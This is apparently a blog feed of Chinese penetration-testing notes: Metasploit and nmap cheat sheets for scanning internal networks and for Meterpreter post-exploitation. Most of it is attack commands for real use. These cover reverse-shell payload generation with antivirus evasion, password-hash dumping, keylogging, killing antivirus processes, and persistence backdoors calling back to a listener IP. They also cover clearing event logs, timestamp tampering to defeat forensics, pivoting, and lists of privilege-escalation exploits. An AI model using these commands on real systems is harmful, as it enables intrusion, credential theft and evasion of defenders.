encoders</p><h4 id="查看支持的空字段模块:-为了达到免杀的效果"><a href="#查看支持的空字段模块:-为了达到免杀的效果" class="headerlink" title="查看支持的空字段模块:(为了达到免杀的效果)"></a>查看支持的空字段模块:(为了达到免杀的效果)</h4><p>msfvenom -l nops</p>]]></content>
<summary type="html">
<h2 id="有效命令"><a href="#有效命令" class="headerlink" title="有效命令"></a>有效命令</h2><p>msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>渗透测试笔记3-内网存活主机扫描</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B03-%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA%E6%89%AB%E6%8F%8F/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记3-内网存活主机扫描/</id>
<published>2019-10-03T08:32:44.000Z</published>
<updated>2019-10-03T08:41:00.974Z</updated>
<content type="html"><![CDATA[<h2 id="基于UDP"><a href="#基于UDP" class="headerlink" title="基于UDP"></a>基于UDP</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的。</p><p>UDP特性:<br>1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。<br>2.UDP 数据报是有长度的。每个UDP数据报都有长度,如果一个数据报正确地到达目的 地,那么该数据报的长度将随数据一起传递给接收方。而TCP是一个字节流协议,没有任 何(协议上的)记录边界。<br>3.UDP是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都 选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报<br>4.UDP支持多播和广播</p><h3 id="namp扫描"><a href="#namp扫描" class="headerlink" title="namp扫描"></a>namp扫描</h3><blockquote><blockquote><p>nmap -sU -T5 -sV –max-retries 1 192.168.1.100 -p 500 </p></blockquote></blockquote><p>缺点:速度超慢</p><h3 id="msf扫描"><a href="#msf扫描" class="headerlink" title="msf扫描"></a>msf扫描</h3><blockquote><blockquote><p>msf>use auxiliary/scanner/discovery/udp_probe<br>msf > use auxiliary/scanner/discovery/udp_sweep</p></blockquote></blockquote><h3 id="unicornscan扫描"><a href="#unicornscan扫描" class="headerlink" title="unicornscan扫描"></a>unicornscan扫描</h3><p>linux下推荐 </p><blockquote><blockquote><p>unicornscan -mU 192.168.1.100</p></blockquote></blockquote><h3 id="ScanLine扫描"><a href="#ScanLine扫描" class="headerlink" title="ScanLine扫描"></a>ScanLine扫描</h3><p>win下推荐 </p><h2 id="基于ARP-效果好"><a href="#基于ARP-效果好" class="headerlink" title="基于ARP(效果好)"></a>基于ARP(效果好)</h2><h3 id="简介-1"><a href="#简介-1" class="headerlink" title="简介"></a>简介</h3><p>ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输 协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的 ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址</p><h3 id="namp扫描-1"><a href="#namp扫描-1" class="headerlink" title="namp扫描"></a>namp扫描</h3><p>信息精准,速度快(推荐)</p><blockquote><blockquote><p>nmap -sn -PR 192.168.1.1/24</p></blockquote></blockquote><h3 id="msf扫描-1"><a href="#msf扫描-1" class="headerlink" title="msf扫描"></a>msf扫描</h3><blockquote><blockquote><p>msf>use auxiliary/scanner/discovery/arp_sweep</p></blockquote></blockquote><h3 id="netdiscover"><a href="#netdiscover" class="headerlink" title="netdiscover"></a>netdiscover</h3><blockquote><blockquote><p>root@John:~# netdiscover -r 192.168.1.0/24 -i wlan0</p></blockquote></blockquote><p>效果较好</p><h3 id="arp-scan-linux"><a href="#arp-scan-linux" class="headerlink" title="arp-scan(linux)"></a>arp-scan(linux)</h3><p>速度快,信息较准确 </p><blockquote><blockquote><p>arp-scan –loaclnet</p></blockquote></blockquote><h3 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h3><blockquote><blockquote><p>c:\tmp>powershell.exe -exec bypass -Command “Import-Module .\arpscan.ps1;InvokeARPScan -CIDR 192.168.1.0/24”</p></blockquote></blockquote><h2 id="基于netbios"><a href="#基于netbios" class="headerlink" title="基于netbios"></a>基于netbios</h2><h3 id="简介-2"><a href="#简介-2" class="headerlink" title="简介"></a>简介</h3><p>IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以 使用的应用程序编程接口(API),为程序提供了请求低级服务的同一的命令集,作用是为 了给局域网提供网络以及其他特殊功能。 系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-——特指基于 NETBIOS协议获得计算机名称——解析为相应IP地址,实现信息通讯,所以在局域网内部使 用NetBIOS协议可以方便地实现消息通信及资源的共享。</p><h3 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p>准确</p><blockquote><blockquote><p>root@John:~# nmap -sU –script nbstat.nse -p137 192.168.1.0/24 -T4</p></blockquote></blockquote><h3 id="msf扫描-2"><a href="#msf扫描-2" class="headerlink" title="msf扫描"></a>msf扫描</h3><p>不准确</p><blockquote><blockquote><p>msf > use auxiliary/scanner/netbios/nbname</p></blockquote></blockquote><h3 id="nbtscan扫描"><a href="#nbtscan扫描" class="headerlink" title="nbtscan扫描"></a>nbtscan扫描</h3><p>不准确</p><blockquote><blockquote><p>nbtscan -r 192.168.1.0/24<br>nbtscan -v -s: 192.168.1.0/24</p></blockquote></blockquote><h2 id="基于SNMP"><a href="#基于SNMP" class="headerlink" title="基于SNMP"></a>基于SNMP</h2><h3 id="简介-3"><a href="#简介-3" class="headerlink" title="简介"></a>简介</h3><p>SNMP是一种简单网络管理协议,它属于TCP/IP五层协议中的应用层协议,用于网络管理的 协议。SNMP主要用于网络设备的管理。SNMP协议主要由两大部分构成:SNMP管理站和 SNMP代理。SNMP管理站是一个中心节点,负责收集维护各个SNMP元素的信息,并对这 些信息进行处理,最后反馈给网络管理员;而SNMP代理是运行在各个被管理的网络节点之 上,负责统计该节点的各项信息,并且负责与SNMP管理站交互,接收并执行管理站的命 令,上传各种本地的网络信息。</p><h3 id="namp扫描-2"><a href="#namp扫描-2" class="headerlink" title="namp扫描"></a>namp扫描</h3><p>垃圾</p><blockquote><blockquote><p>nmap -sU –script snmp-brute 192.168.1.0/24 -T4</p></blockquote></blockquote><h3 id="msf扫描-3"><a href="#msf扫描-3" class="headerlink" title="msf扫描"></a>msf扫描</h3><blockquote><blockquote><p>msf > use auxiliary/scanner/snmp/snmp_enum</p></blockquote></blockquote><h2 id="基于ICMP"><a href="#基于ICMP" class="headerlink" title="基于ICMP"></a>基于ICMP</h2><h3 id="简介-4"><a href="#简介-4" class="headerlink" title="简介"></a>简介</h3><p>它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指 网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输 用户数据,但是对于用户数据的传递起着重要的作用</p><h3 id="nmap扫描-1"><a href="#nmap扫描-1" class="headerlink" title="nmap扫描"></a>nmap扫描</h3><p>fail????</p><blockquote><blockquote><p>nmap ‐sP ‐PI 192.168.1.0/24 ‐T4<br>nmap ‐sn ‐PE ‐T4 192.168.1.0/24</p></blockquote></blockquote><h2 id="基于SMB"><a href="#基于SMB" class="headerlink" title="基于SMB"></a>基于SMB</h2><h3 id="msf扫描-4"><a href="#msf扫描-4" class="headerlink" title="msf扫描"></a>msf扫描</h3><blockquote><blockquote><p>scanner/smb/smb_version</p></blockquote></blockquote><h2 id="基于msf"><a href="#基于msf" class="headerlink" title="基于msf"></a>基于msf</h2><p>搜索扫描器</p><blockquote><blockquote><p>search scanner type:auxiliary</p></blockquote></blockquote><ul><li>auxiliary/scanner/discovery/arp_sweep</li><li>auxiliary/scanner/discovery/udp_sweep</li><li>auxiliary/scanner/ftp/ftp_version</li><li>auxiliary/scanner/http/http_version</li><li>auxiliary/scanner/smb/smb_version</li></ul><ul><li>auxiliary/scanner/ssh/ssh_version</li><li>auxiliary/scanner/telnet/telnet_version</li><li>auxiliary/scanner/discovery/udp_probe</li><li>auxiliary/scanner/dns/dns_amp</li><li>auxiliary/scanner/mysql/mysql_version</li></ul>]]></content>
<summary type="html">
<h2 id="基于UDP"><a href="#基于UDP" class="headerlink" title="基于UDP"></a>基于UDP</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
</entry>
<entry>
<title>渗透测试笔记2-MSF常用模块记录</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B02-MSF%E5%B8%B8%E7%94%A8%E6%A8%A1%E5%9D%97%E8%AE%B0%E5%BD%95/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记2-MSF常用模块记录/</id>
<published>2019-10-03T08:30:49.000Z</published>
<updated>2019-10-03T08:31:29.076Z</updated>
<content type="html"><![CDATA[<h3 id="运行自动化脚本"><a href="#运行自动化脚本" class="headerlink" title="运行自动化脚本"></a>运行自动化脚本</h3><blockquote><blockquote><p>msfconsole -r auto.rc</p></blockquote></blockquote><h3 id="检测是否为虚拟机"><a href="#检测是否为虚拟机" class="headerlink" title="检测是否为虚拟机"></a>检测是否为虚拟机</h3><blockquote><blockquote><p>post/windows/gather/checkvm</p></blockquote></blockquote><h3 id="获取磁盘信息"><a href="#获取磁盘信息" class="headerlink" title="获取磁盘信息"></a>获取磁盘信息</h3><blockquote><blockquote><p>windows/gather/forensics/enum_drives</p></blockquote></blockquote><h3 id="补丁信息"><a href="#补丁信息" class="headerlink" title="补丁信息"></a>补丁信息</h3><blockquote><blockquote><p>run post/windows/gather/enum_patches</p></blockquote></blockquote><h3 id="事务日志"><a href="#事务日志" class="headerlink" title="事务日志"></a>事务日志</h3><p>查看:</p><blockquote><blockquote><p>run event_manager -i</p></blockquote></blockquote><p>清除:</p><blockquote><blockquote><p>run event_manager -c</p></blockquote></blockquote><h3 id="获取敏感信息"><a href="#获取敏感信息" class="headerlink" title="获取敏感信息"></a>获取敏感信息</h3><p>run post/windows/gather/enum_applications #获取安装软件信息</p><p>run post/windows/gather/dumplinks #获取最近的文件操作</p><p>run post/windows/gather/enum_ie #获取IE缓存</p><p>run post/windows/gather/enum_chrome #获取Chrome缓存</p><p>run post/windows/gather/enum_shares #列出共享及历史共享</p><p>run enum_vmware #列出vmware的配置文件和产品</p><p>run scraper #从目标主机获得所有网络共享等信息</p><p>run getcountermeasure #显示HIPS和AV进程的列表,显示远程机器的防火墙规则,列出DEP和UAC策略</p><p>run hashdump #获得密码哈希值</p><p>run windows/gather/smart_hashdump #获取哈希值,功能更强大</p><p>run keylogrecorder #记录键盘信息</p><p>run get_env #获取所有用户的环境变量</p><p>run getvncpw #获取VNC账户密码</p><h2 id="网络信息"><a href="#网络信息" class="headerlink" title="网络信息"></a>网络信息</h2><p>run packetrecorder #查看目标系统的所有网络流量,并且进行数据包记录,-i 1指定记录数据包的网卡</p><p>run get_local_subnets #得到本地子网网段</p><p>run arp_scanner-r 192.168.1.0/24 #利用arp进行存活主机扫描</p><h2 id="绕过防火墙"><a href="#绕过防火墙" class="headerlink" title="绕过防火墙"></a>绕过防火墙</h2><p>run killav #终止Av进程,可以很快的清除我们的路径和有效渗透测试的记录</p><p>run getcountermeasure #列出HIPS 和 AV 的进程,显示XP 防火墙规则, 并且显示 DEP和UAC 策略<br>Ps:-k参数可以杀掉防护软件进程</p><h2 id="持久后门"><a href="#持久后门" class="headerlink" title="持久后门"></a>持久后门</h2><p>run persistence #用作持久后门<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">-A 自动启动一个匹配的exploit / multi / handler来连接到代理</span><br><span class="line">-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。</span><br><span class="line">-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。</span><br><span class="line">-S 作为服务自动启动代理程序(具有SYSTEM权限)</span><br><span class="line">-T 要使用的备用可执行模板</span><br><span class="line">-U 用户登录时自动启动代理</span><br><span class="line">-X 系统引导时自动启动代理程序</span><br><span class="line">-h 这个帮助菜单</span><br><span class="line">-i 每次连接尝试之间的时间间隔(秒)</span><br><span class="line">-p 运行Metasploit的系统正在侦听的端口</span><br><span class="line">-r 运行Metasploit监听连接的系统的IP</span><br></pre></td></tr></table></figure></p><blockquote><blockquote><p>run persistence -U -i 5 -p 443 -r 192.168.1.71</p></blockquote></blockquote><h2 id="开启远程桌面"><a href="#开启远程桌面" class="headerlink" title="开启远程桌面"></a>开启远程桌面</h2><blockquote><blockquote><p>run post/windows/manage/enable_rdp</p></blockquote></blockquote><p>run win32-sshserver #安装openssh服务</p><p>run vnc #可以看到远程桌面</p><h2 id="一些常用的破解模块"><a href="#一些常用的破解模块" class="headerlink" title="一些常用的破解模块"></a>一些常用的破解模块</h2><p>auxiliary/scanner/mssql/mssql_login</p><p>auxiliary/scanner/ftp/ftp_login</p><p>auxiliary/scanner/ssh/ssh_login</p><p>auxiliary/scanner/telnet/telnet_login</p><p>auxiliary/scanner/smb/smb_login</p><p>auxiliary/scanner/mssql/mssql_login</p><p>auxiliary/scanner/mysql/mysql_login</p><p>auxiliary/scanner/oracle/oracle_login</p><p>auxiliary/scanner/postgres/postgres_login</p><p>auxiliary/scanner/vnc/vnc_login</p><p>auxiliary/scanner/pcanywhere/pcanywhere_login</p><p>auxiliary/scanner/snmp/snmp_login</p><p>auxiliary/scanner/ftp/anonymous</p><h2 id="一些好用的模块"><a href="#一些好用的模块" class="headerlink" title="一些好用的模块"></a>一些好用的模块</h2><p>auxiliary/admin/realvnc_41_bypass (Bypass VNCV4网上也有利用工具)</p><p>auxiliary/admin/cisco/cisco_secure_acs_bypass (cisco Bypass 版本5.1或者未打补丁5.2版洞略老)</p><p>auxiliary/admin/http/jboss_deploymentfilerepository (内网遇到Jboss最爱:))</p><p>auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)</p><p>auxiliary/admin/mssql/mssql_exec (用爆破得到的sa弱口令进行执行命令没回显:()</p><p>auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)</p><p>auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)</p><p>auxiliary/admin/oracle/post_exploitation/win32exec (爆破得到Oracle弱口令来Win32命令执行)</p><p>auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)</p><p>auxiliary/scanner/rsync/modules_list (Rsync)</p><p>auxiliary/scanner/misc/redis_server (Redis)</p><p>auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)</p><p>auxiliary/scanner/mongodb/mongodb_login (Mongodb)</p><p>auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)</p><p>auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)</p><p>auxiliary/scanner/http/http_put (http Put)</p><p>auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)</p><p>auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)</p><p>auxiliary/scanner/http/svn_scanner (svn Hunter :))</p><p>auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)</p><p>auxiliary/scanner/http/zabbix_login (Zabbix :))</p><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><h4 id="ms10-073-ms10-092"><a href="#ms10-073-ms10-092" class="headerlink" title="ms10-073\ms10-092"></a>ms10-073\ms10-092</h4><h4 id="ms14-002"><a href="#ms14-002" class="headerlink" title="ms14-002"></a>ms14-002</h4><p>Windows XP<br>Windows Server 2003</p><h4 id="ms15-001"><a href="#ms15-001" class="headerlink" title="ms15-001"></a>ms15-001</h4><h4 id="ms15-051"><a href="#ms15-051" class="headerlink" title="ms15_051"></a>ms15_051</h4><p>Microsoft Windows Vista<br>Microsoft Windows Server 2012 R2<br>Microsoft Windows Server 2012<br>Microsoft Windows Server 2008 R2<br>Microsoft Windows Server 2008<br>Microsoft Windows Server 2003<br>Microsoft Windows RT 8.1<br>Microsoft Windows RT<br>Microsoft Windows 8.1<br>Microsoft Windows 8<br>Microsoft Windows 7 </p><h4 id="ms16-016"><a href="#ms16-016" class="headerlink" title="ms16-016"></a>ms16-016</h4><p>根据微软官方信息显示,此漏洞存在于在:</p><p>Windows Vista SP2<br>Windows Server 2008 x86 & x64<br>Windows Server 2008 R2 x64<br>Windows 7 x86 & x64<br>Windows 8.1 x86 & x64 </p><p>系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):</p><p>Windows Server 2012<br>Windows Server 2012 R2<br>Windows RT 8.1<br>Windows 10 </p><h4 id="ms16-032"><a href="#ms16-032" class="headerlink" title="ms16-032"></a>ms16-032</h4><p>多exp</p><h4 id="MS16-075-烂土豆"><a href="#MS16-075-烂土豆" class="headerlink" title="MS16-075(烂土豆)"></a>MS16-075(烂土豆)</h4><p>全版本通杀</p><h4 id="ms"><a href="#ms" class="headerlink" title="ms"></a>ms</h4><h4 id="UAC提权"><a href="#UAC提权" class="headerlink" title="UAC提权"></a>UAC提权</h4><h5 id="提高程序运行级别(runas)"><a href="#提高程序运行级别(runas)" class="headerlink" title="提高程序运行级别(runas)"></a>提高程序运行级别(runas)</h5><p>exploit/windows/local/ask </p><h5 id="绕过UAC"><a href="#绕过UAC" class="headerlink" title="绕过UAC"></a>绕过UAC</h5><p>exploit/windows/local/bypassuac </p><blockquote><blockquote><p>模块执行成功后,执行getuid发现还是普通权限,不要失望,继续执行getsystem,再次查看权限,成功绕过UAC,且已经是系统权限了。</p></blockquote></blockquote><h4 id="CVE-2018-8120"><a href="#CVE-2018-8120" class="headerlink" title="CVE-2018-8120"></a>CVE-2018-8120</h4><p>Microsoft Windows Server 2008 R2 for x64-based Systems SP1<br>Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1<br>Microsoft Windows Server 2008 for x64-based Systems SP2<br>Microsoft Windows Server 2008 for Itanium-based Systems SP2<br>Microsoft Windows Server 2008 for 32-bit Systems SP2<br>Microsoft Windows 7 for x64-based Systems SP1<br>Microsoft Windows 7 for 32-bit Systems SP1 </p><h4 id="mysql-提权"><a href="#mysql-提权" class="headerlink" title="mysql 提权"></a>mysql 提权</h4><p>mysql_mof mof提权 </p><h2 id="远程代码执行"><a href="#远程代码执行" class="headerlink" title="远程代码执行"></a>远程代码执行</h2><h4 id="ms15-020"><a href="#ms15-020" class="headerlink" title="ms15-020"></a>ms15-020</h4><p>生成link共享文件</p>]]></content>
<summary type="html">
<h3 id="运行自动化脚本"><a href="#运行自动化脚本" class="headerlink" title="运行自动化脚本"></a>运行自动化脚本</h3><blockquote>
<blockquote>
<p>msfconsole -r auto.rc</p
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>渗透测试笔记1-Meterpreter后渗透</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B01-Meterpreter%E5%90%8E%E6%B8%97%E9%80%8F/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记1-Meterpreter后渗透/</id>
<published>2019-10-03T07:58:35.000Z</published>
<updated>2019-10-03T08:01:26.927Z</updated>
<content type="html"><![CDATA[<h2 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>基本命令</h2><h4 id="background"><a href="#background" class="headerlink" title="background"></a>background</h4><p>将meterpreter终端隐藏在后台,msf可执行其它任务.</p><h4 id="sessions"><a href="#sessions" class="headerlink" title="sessions"></a>sessions</h4><p>查看已获取的会话,sessions -i 与某对话交互</p><h4 id="quit"><a href="#quit" class="headerlink" title="quit"></a>quit</h4><p>关闭当前会话,返回msf终端</p><h4 id="shell"><a href="#shell" class="headerlink" title="shell"></a>shell</h4><p>获取系统的控制台shell</p><h4 id="reboot"><a href="#reboot" class="headerlink" title="reboot"></a>reboot</h4><p>重新启动受害人的计算机</p><h4 id="irb"><a href="#irb" class="headerlink" title="irb"></a>irb</h4><p>与ruby终端交互,可以直接调用metasploit封装好的函数,如:</p><blockquote><blockquote><p>client.sys.config.sysinfo() </p></blockquote></blockquote><p>添加metasploit的附加组件-Railgun,直接与windows api交互,命令:</p><blockquote><blockquote><p>client.core.use(“railgun”)<br>client.railgun.user32.MessageBox(0,”hello word!”,null,MB_OK)</p></blockquote></blockquote><h4 id="clearev-clearav"><a href="#clearev-clearav" class="headerlink" title="clearev/clearav"></a>clearev/clearav</h4><p>清除目标系统的事件日志</p><h4 id="idletime"><a href="#idletime" class="headerlink" title="idletime"></a>idletime</h4><p>显示目标机器截止到当前无操作命令的时间</p><h4 id="基于MACE时间的反电子取证"><a href="#基于MACE时间的反电子取证" class="headerlink" title="基于MACE时间的反电子取证"></a>基于MACE时间的反电子取证</h4><p>timestomp -v secist.txt #查看当前目标文件 MACE 时间<br>timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间,例如修改文件的创建时间(反取证调查)<br>timestomp -f c:\AVScanner.ini secist.txt (将模板文件MACE时间,复制给当前文件)</p><h2 id="文件命令"><a href="#文件命令" class="headerlink" title="文件命令"></a>文件命令</h2><h4 id="cat"><a href="#cat" class="headerlink" title="cat"></a>cat</h4><p>查看文件,注意双斜杠转义,如: </p><blockquote><blockquote><p>cat c:\boot.ini </p></blockquote></blockquote><h4 id="getwd"><a href="#getwd" class="headerlink" title="getwd"></a>getwd</h4><p>获取目标机上当前的工作目录</p><h4 id="upload"><a href="#upload" class="headerlink" title="upload"></a>upload</h4><p>上传文件到目标机:</p><blockquote><blockquote><p>upload net.exe c:\</p></blockquote></blockquote><h4 id="download"><a href="#download" class="headerlink" title="download"></a>download</h4><p>下载文件:</p><blockquote><blockquote><p>download xxx.txt /tmp</p></blockquote></blockquote><h4 id="edit"><a href="#edit" class="headerlink" title="edit"></a>edit</h4><p>调用vim编辑文件,如编辑hosts文件</p><h4 id="search"><a href="#search" class="headerlink" title="search"></a>search</h4><p>搜索文件</p><h2 id="网络命令"><a href="#网络命令" class="headerlink" title="网络命令"></a>网络命令</h2><h4 id="ipconfig"><a href="#ipconfig" class="headerlink" title="ipconfig"></a>ipconfig</h4><p>获取网络接口信息</p><h4 id="portfwd"><a href="#portfwd" class="headerlink" title="portfwd"></a>portfwd</h4><p>端口转发</p><blockquote><blockquote><p>portfwd add -l 1234 -p 3389 -r 192.168.10.142</p></blockquote></blockquote><p>然后使用kali的rdesktop命令连接本地的1234端口,与远程主机的3389端口建立连接:</p><blockquote><blockquote><p>rdesktop -u admin -p 1234 127.0.0.1:1234</p></blockquote></blockquote><h4 id="route"><a href="#route" class="headerlink" title="route"></a>route</h4><p>显示目标主机的路由信息</p><h4 id="run-get-local-subnets"><a href="#run-get-local-subnets" class="headerlink" title="run get_local_subnets"></a>run get_local_subnets</h4><p>查看已拿下的目标主机的内网IP段情况</p><h4 id="添加一条通向目标服务器内网的路由"><a href="#添加一条通向目标服务器内网的路由" class="headerlink" title="添加一条通向目标服务器内网的路由"></a>添加一条通向目标服务器内网的路由</h4><p>查看shell网络环境:</p><blockquote><blockquote><p>meterpreter>run get_local_subnets</p></blockquote></blockquote><p>添加一条通向目标服务器内网的路由</p><blockquote><blockquote><p>meterpreter>run autoroute -s 100.0.0.0/8 #(根据目标内网网络而定)</p></blockquote></blockquote><p>查看路由设置:</p><blockquote><blockquote><p>meterpreter>run autoroute –p</p></blockquote></blockquote><p>一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败,这时我们可以background返回msf>,查看下外面的路由情况。</p><blockquote><blockquote><p>route print</p></blockquote></blockquote><p>如果发现没有路由信息,说明meterpreter shell设置的路由并没有生效,我们可以在msf中添加路由。</p><blockquote><blockquote><p>msf>route add 10.0.0.0 255.0.0.0 1</p></blockquote></blockquote><p>说明:1表示session 1,攻击机如果要去访问10.0.0.0/8网段的资源,其下一跳是session1,至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。</p><h4 id="内网代理"><a href="#内网代理" class="headerlink" title="内网代理"></a>内网代理</h4><p>msf exploit(handler) > use auxiliary/server/socks4a</p><p>msf auxiliary(socks4a) > route print</p><p>msf auxiliary(socks4a) > ifconfig</p><p>msf auxiliary(socks4a) > set SRVHOST xxx.xxx.xx.xx #xxx.xxx.xx.xx为自己运行msf的vps机子’</p><p>msf auxiliary(socks4a) > exploit </p><p>proxychains nmap 192.168.1.0/24</p><h2 id="系统命令"><a href="#系统命令" class="headerlink" title="系统命令"></a>系统命令</h2><h4 id="ps"><a href="#ps" class="headerlink" title="ps"></a>ps</h4><p>查看进程信息</p><h4 id="migrate"><a href="#migrate" class="headerlink" title="migrate"></a>migrate</h4><p>将meterpreter移植到另一进程空间中,如:migrate 304</p><h4 id="execute"><a href="#execute" class="headerlink" title="execute"></a>execute</h4><p>在目标机上执行命令<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > execute</span><br><span class="line">Usage: execute -f file [options]</span><br><span class="line">Executes a command on the remote machine.</span><br><span class="line"></span><br><span class="line">OPTIONS:</span><br><span class="line"></span><br><span class="line"> -H Create the process hidden from view.</span><br><span class="line"> -a <opt> The arguments to pass to the command.</span><br><span class="line"> -c Channelized I/O (required for interaction).</span><br><span class="line"> -d <opt> The 'dummy' executable to launch when using -m.</span><br><span class="line"> -f <opt> The executable command to run.</span><br><span class="line"> -h Help menu.</span><br><span class="line"> -i Interact with the process after creating it.</span><br><span class="line"> -k Execute process on the meterpreters current desktop</span><br><span class="line"> -m Execute from memory.</span><br><span class="line"> -s <opt> Execute process in a given session as the session user</span><br><span class="line"> -t Execute process with currently impersonated thread token</span><br></pre></td></tr></table></figure></p><p>例:</p><blockquote><blockquote><p>execute -H -f cmd.exe 隐藏执行cmd.exe<br>execute -H -i -f cmd.exe 与cmd进行交互</p></blockquote></blockquote><p>-m参数直接在内存中执行,不易留下痕迹</p><h4 id="getpid"><a href="#getpid" class="headerlink" title="getpid"></a>getpid</h4><p>获取当前会话进程的PID值</p><h4 id="kill"><a href="#kill" class="headerlink" title="kill"></a>kill</h4><p>终结指定的进程</p><h4 id="getuid"><a href="#getuid" class="headerlink" title="getuid"></a>getuid</h4><p>查看当前的用户名,从而查看会话具有的权限</p><h4 id="sysinfo"><a href="#sysinfo" class="headerlink" title="sysinfo"></a>sysinfo</h4><p>获取目标系统的信息</p><h4 id="shutdown"><a href="#shutdown" class="headerlink" title="shutdown"></a>shutdown</h4><p>关闭目标主机</p><h2 id="植入后门"><a href="#植入后门" class="headerlink" title="植入后门"></a>植入后门</h2><h4 id="persistence"><a href="#persistence" class="headerlink" title="persistence"></a>persistence</h4><p>向注册表中注入键值,维持权限</p><blockquote><blockquote><p>run persistence -U -i 5 -p 443 -r 192.168.1.71</p></blockquote></blockquote><h4 id="metsvc"><a href="#metsvc" class="headerlink" title="metsvc"></a>metsvc</h4><p>以系统服务形式安装到主机</p><h4 id="getgui"><a href="#getgui" class="headerlink" title="getgui"></a>getgui</h4><p>开启远程桌面</p><blockquote><blockquote><p>run getgui -u xxxxx -p xxxxxx</p></blockquote></blockquote><p>开启3389端口</p><blockquote><blockquote><p>run getgui -e</p></blockquote></blockquote><h2 id="提升权限"><a href="#提升权限" class="headerlink" title="提升权限"></a>提升权限</h2><h4 id="getsystem-命令"><a href="#getsystem-命令" class="headerlink" title="getsystem 命令"></a>getsystem 命令</h4><p>提权:ms09-012\ms10-015</p><h4 id="ms10-073-ms10-092"><a href="#ms10-073-ms10-092" class="headerlink" title="ms10-073\ms10-092"></a>ms10-073\ms10-092</h4><h2 id="键盘监听"><a href="#键盘监听" class="headerlink" title="键盘监听"></a>键盘监听</h2><p>Meterpreter还可以在目标设备上实现键盘记录功能,键盘记录主要涉及以下三种命令:</p><p>keyscan_start:开启键盘记录功能</p><p>keyscan_dump:显示捕捉到的键盘记录信息</p><p>keyscan_stop:停止键盘记录功能</p><p>uictl enable keyboard/mouse#接管目标主机的键盘和鼠标。</p><p>meterpreter > keyscan_start #针对远程目标主机开启键盘记录功能</p><p>Starting the keystroke sniffer…</p><p>meterpreter > 